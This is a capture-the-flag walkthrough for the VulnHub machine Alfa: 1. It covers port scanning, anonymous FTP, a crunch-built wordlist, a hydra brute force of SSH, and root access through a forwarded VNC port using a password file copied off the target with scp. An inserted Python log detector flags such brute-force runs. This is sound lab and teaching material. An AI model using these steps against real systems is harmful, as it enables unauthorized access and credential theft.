Alfa: 1 is another awesome box on vulnhub. The difficulty of this box is Medium, and it needs Enumeration and Brute Force to get into the system. Here is the link: https://www.vulnhub.com/entry/alfa-1,655/

-Enumeration
-Brute Force
-User
-Privilege Escalation
-Root

#nmap

 #nmap -p- -sV 192.168.1.X 
PORT        STATE   SERVICE     VERSION
 21/tcp       open       ftp           vsftpd 3.0.3
 80/tcp       open       http          Apache httpd 2.4.38 ((Debian))
 139/tcp     open  netbios-ssn    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp     open  netbios-ssn    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 65111/tcp open       ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 Service Info: Host: ALFA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

#ftp anonymous login allowed

Checked every single port and found that ftp allows the anonymous user to log in. After logging in, got a directory named thomas (a guess: it may be a username) and an image file named milo.jpg

#enumerate web service

Stuck at the ftp service, so try to enumerate the http service. Some directory fuzzing found nothing more than robots.txt, and digging into robots.txt turned up brainfuck code

Simply decode it using dcode.fr and get /alfa-support

Visit /alfa-support and get a hint about the password

#crunch & sed

Create a custom wordlist with milo followed by 3 numerical digits

$crunch 3 3 1234567890 -o wordlist.txt

Add milo as a prefix using sed

$sed -i -e 's/^/milo/' wordlist.txt

#brute-force

As we have the username thomas, we can brute-force the ssh service running on port 65111 using hydra

$hydra -s 65111 -l thomas -P wordlist.txt 192.168.1.X -t 4 ssh
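Seen from the target, a run like this is a burst of failed sshd logins for one account from one source, and the interesting case is when it ends in a successful login. The following is an added example, not part of the original write-up, that flags that pattern; the log lines are constructed, and the threshold, window and year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in Debian auth.log format (not captured from the box).
SAMPLE_LOG = """\
Jan 10 10:00:01 alfa sshd[900]: Failed password for thomas from 192.168.1.50 port 40001 ssh2
Jan 10 10:00:02 alfa sshd[900]: Failed password for thomas from 192.168.1.50 port 40002 ssh2
Jan 10 10:00:03 alfa sshd[901]: Failed password for thomas from 192.168.1.50 port 40003 ssh2
Jan 10 10:00:04 alfa sshd[901]: Failed password for thomas from 192.168.1.50 port 40004 ssh2
Jan 10 10:00:05 alfa sshd[902]: Failed password for thomas from 192.168.1.50 port 40005 ssh2
Jan 10 10:00:06 alfa sshd[902]: Accepted password for thomas from 192.168.1.50 port 40006 ssh2
Jan 10 10:05:00 alfa sshd[903]: Failed password for invalid user admin from 192.168.1.77 port 51000 ssh2
Jan 10 10:30:00 alfa sshd[904]: Failed password for invalid user admin from 192.168.1.77 port 51001 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<what>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2021):
    """Map (source, user) -> (max failures inside window, login succeeded afterwards).

    Syslog timestamps carry no year, so `year` is supplied by the caller (assumption).
    """
    failed, accepted = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        bucket = failed if m["what"] == "Failed" else accepted
        bucket[(m["src"], m["user"])].append(ts)
    alerts = {}
    for key, stamps in failed.items():
        stamps.sort()
        start = best = 0
        for end, ts in enumerate(stamps):      # sliding window over the failures
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # A success after the first failure means the guessing likely worked.
            alerts[key] = (best, any(t >= stamps[0] for t in accepted[key]))
    return alerts

if __name__ == "__main__":
    for (src, user), (count, ok) in find_bruteforce(SAMPLE_LOG).items():
        print(f"{src} -> {user}: {count} failures, login succeeded: {ok}")
```

Rate limiting (fail2ban or sshd's MaxAuthTries), key-only authentication and a password that is not derivable from files on the anonymous FTP share each break the step this detects.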

#user-flag

Log in via ssh and get user.txt

#privilege escalation

Run linpeas.sh on the machine and find a vnc service listening locally on port 5901

The same privilege escalation scenario is found here:
https://medium.com/@D00MFist/hack-the-box-poison-3d95f552ec36

Forward my local port 7000 (attacking machine) to port 5901

$sudo ssh -L 7000:localhost:5901 [email protected] -p 65111

After attempting to connect, a password was required. I tried milo666 as the password but it failed.

$vncviewer 127.0.0.1:7000

As I said, it is the same scenario for privilege escalation: I also got a .remote_secret password file. I simply copied that file from the target to the attacker box using scp

$scp .remote_secret [email protected]:/home/Desktop/secret

Connect again using the -passwd option

$vncviewer 127.0.0.1:7000 -passwd secret

Successfully got root flag 🙂
